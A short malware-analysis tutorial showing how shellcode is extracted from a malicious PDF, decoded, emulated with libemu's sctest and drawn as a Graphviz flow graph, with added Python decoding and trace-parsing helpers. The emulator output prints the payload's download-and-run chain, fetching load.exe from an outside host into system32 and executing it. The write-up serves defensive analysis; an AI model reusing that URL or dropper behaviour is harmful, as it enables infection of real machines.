Using libemu to create malware flow graph

Muhammad Najmi Ahmad Zabidi najmi.zabidi@gmail.com∗

Abstract: In this paper I document my personal experience of extracting shellcode from PDF malware and rendering its flow graph as a Graphviz picture. Most of the examples are adapted from the tutorial by [Jeremy, 2008].

1 Introduction

In this write-up I show how to extract shellcode from PDF files.

2 PDF malware

A malicious PDF contains embedded JavaScript (*.js). This JavaScript may perform harmful activity without the user's consent.

3 Steps to extract shellcodes

3.1 Tools of trade

What we need to do is basically use existing tools. For now I suggest you download the following:
• http://code.google.com/p/pyew/
• http://libemu.carnivore.it/
• http://www.graphviz.org/

3.2 Extracting the shellcode
I used pdf_example.py from the pyew package.

    $ ls pdf_example.py -l
    -rwxr-xr-x 1 najmi najmi 1497 2010-03-30 20:03 pdf_example.py

Given a PDF malware sample fetched from the wild:

    $ avgscan bc66fd9e0c2f7a79167dab16531c28f2
    AVG command line Anti-Virus scanner
    Copyright (c) 2009 AVG Technologies CZ

    Virus database version: 271.1.1/2834
    Virus database release date: Sun, 25 Apr 2010 14:31:00 +08:00

    bc66fd9e0c2f7a79167dab16531c28f2  Virus found Script/Exploit

    Files scanned     : 1(1)
    Infections found  : 1(1)
    PUPs found        : 0
    Files healed      : 0
    Warnings reported : 0
    Errors reported   : 0

∗ Thanks to my wife, for providing hot coffee!

Using the pyew tool from Section 3.1, I manually located the obfuscated (%u-escaped) shellcode string, shown in Figure 1:

Figure 1: PDF shellcodes in Pyew tool

Now let us look at the strings. Take the strings between the unescape() brackets and save them in a text editor.


Figure 2: PDF shellcodes (Zoom mode)

Now we need to strip the %u escapes and turn the string into raw shellcode bytes; the following perl one-liner does this (each %uXXYY becomes the two bytes YY XX):

    cat shell.txt | perl -pe 's/\%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' > filtered-shell.txt

Now you should have the actual shellcode. A plain URL is visible inside it, for example with the hexdump tool:

    $ hexdump -C filtered-shell.txt
    [hexdump output not reproduced; its ASCII column ends with the URL http://buterik.com/123/load.exe]
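As an added example (not code from the paper), the same %u decoding the perl one-liner performs, in Python, plus a URL scan and a hexdump -C style listing; it generalizes the one-liner slightly by also handling plain %XX escapes. The SAMPLE string is constructed, not the paper's shellcode.

```python
import re
from typing import List

# Constructed sample (not the shellcode from the paper): a %u-escaped string of the
# kind found between the unescape() brackets in a malicious PDF's JavaScript.
# It decodes to four NOP bytes followed by a NUL-terminated URL.
SAMPLE = "%u9090%u9090%u7468%u7074%u2f3a%u652f%u6178%u706d%u656c%u632e%u6d6f%u002f"

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
_URL = re.compile(rb"https?://[\x21-\x7e]+")

def decode_unescape(s: str) -> bytes:
    """Turn a JavaScript unescape()-style string into raw shellcode bytes:
    %uHHLL -> bytes LL HH (UTF-16 code unit stored little-endian, exactly what
    the paper's perl one-liner does), %HH -> byte HH, other chars copied through."""
    out = bytearray()
    pos = 0
    for m in _ESC.finditer(s):
        out += s[pos:m.start()].encode("latin-1")
        if m.group(1):
            word = int(m.group(1), 16)
            out += bytes([word & 0xFF, word >> 8])
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += s[pos:].encode("latin-1")
    return bytes(out)

def find_urls(blob: bytes) -> List[str]:
    """Return printable http(s) URLs embedded in the decoded shellcode."""
    return [m.group(0).decode("ascii") for m in _URL.finditer(blob)]

def hexdump(blob: bytes, width: int = 16) -> str:
    """Render bytes in the same layout as `hexdump -C` (offset, hex, ASCII)."""
    lines = []
    for off in range(0, len(blob), width):
        chunk = blob[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        ascii_part = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart:<{width * 3}} |{ascii_part}|")
    return "\n".join(lines)

if __name__ == "__main__":
    raw = decode_unescape(SAMPLE)
    print(hexdump(raw))
    print("URLs:", find_urls(raw))
```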


Now we need to call libemu's tool, sctest, with the following command:

    sctest -Sgs 1000000 -v < filtered-shell-bc66fd9e0c2f7a79167dab16531c28f2.txt

It will create the following output:

    verbose = 1
    success offset = 0x00000017
    Hook me Captain Cook!
    userhooks.c:132 user_hook_ExitThread
    ExitThread(-1)
    stepcount 314316
    HMODULE LoadLibraryA (
         LPCTSTR lpFileName = 0x00417195 =>
               = "URLMON";
    ) =  0x7df20000;
    UINT GetSystemDirectory (
         LPTSTR lpBuffer = 0x0012fae8 =>
               = "c:\WINDOWS\system32";
         UINT uSize = 255;
    ) =  19;
    ERROR DeleteFile (
         LPCTSTR lpFileName = 0x0012fae8 =>
               none;
    ) =  -1;
    HRESULT URLDownloadToFile (
         LPUNKNOWN pCaller = 0x00000000 =>
               none;
         LPCTSTR szURL = 0x0041719c =>
               = "http://buterik.com/123/load.exe";
         LPCTSTR szFileName = 0x0012fae8 =>
               = "c:\WINDOWS\system32\~.exe";
         DWORD dwReserved = 0;
         LPBINDSTATUSCALLBACK lpfnCB = 0;
    ) =  0;
    UINT WINAPI WinExec (
         LPCSTR lpCmdLine = 0x0012fae8 =>
               = "c:\WINDOWS\system32\~.exe";
         UINT uCmdShow = 0;
    ) =  32;
    void ExitThread (
         DWORD dwExitCode = -1;
    ) =  0;

To create a flow graph, add the -G flag (followed by an output file name) to the sctest invocation:

    sctest -Sgs 1000000 -v -G shell.dot < filtered-shell-bc66fd9e0c2f7a79167dab16531c28f2.txt

Next, execute the dot command (from the Graphviz package):

    dot shell.dot -Tpng -o shell.png

This creates a PNG file containing the shellcode's flow graph.
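As an added example (not code from the paper or from libemu), a small parser for the sctest API trace shown above that renders the call sequence as Graphviz DOT; this is the sequence of hooked API calls, not the instruction-level flow graph that -G produces. The TRACE string is constructed with placeholder addresses and a placeholder URL.

```python
import re

# Constructed sctest-style API trace (libemu's layout, placeholder addresses
# and a placeholder URL; not the sample from the paper).
TRACE = """\
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
           none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://example.invalid/payload.exe";
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fae8 =>
           = "c:\\WINDOWS\\system32\\~.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = -1;
) =  0;
"""
_CALL = re.compile(r"^\w+(?: WINAPI)? (\w+) \($")      # e.g. "UINT WINAPI WinExec ("
_ARG = re.compile(r"^\w+ (\w+) = (\S+?);?(?: =>)?$")    # e.g. "UINT uCmdShow = 0;"

def parse_trace(text: str) -> list:
    # One {"name", "args", "ret"} per call; an argument line ending in "=>" takes
    # the dereferenced string from the next line (None when sctest prints "none").
    calls, pending = [], None
    for line in text.splitlines():
        s = line.strip()
        if (m := _CALL.match(s)):
            calls.append({"name": m.group(1), "args": {}, "ret": None})
        elif not calls:                      # header lines before the first call
            continue
        elif s.startswith(") ="):
            calls[-1]["ret"] = s[3:].strip(" ;")
        elif pending and (s.startswith('= "') or s == "none;"):
            calls[-1]["args"][pending] = None if s == "none;" else s[3:-2]
            pending = None
        elif (m := _ARG.match(s)):
            calls[-1]["args"][m.group(1)] = m.group(2)
            pending = m.group(1) if s.endswith("=>") else None
    return calls

def to_dot(calls: list) -> str:
    # Graphviz digraph of the call sequence: one box per call, edges in trace order.
    esc = lambda v: str(v).replace("\\", "\\\\").replace('"', '\\"')
    out = ["digraph apicalls {", "  node [shape=box, fontname=monospace];"]
    for i, c in enumerate(calls):
        rows = [f"{esc(c['name'])} -> {esc(c['ret'])}"] + [f"{k}={esc(v)}" for k, v in c["args"].items()]
        out.append('  n%d [label="%s"];' % (i, "\\n".join(rows)) + (" n%d -> n%d;" % (i - 1, i) if i else ""))
    return "\n".join(out + ["}"])
```

Feed the resulting text to dot exactly as with shell.dot above (dot -Tpng -o calls.png) to get a picture of the API call chain.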


References
[Jeremy, 2008] Jeremy (2008). http://www.sudosecure.net/archives/313.
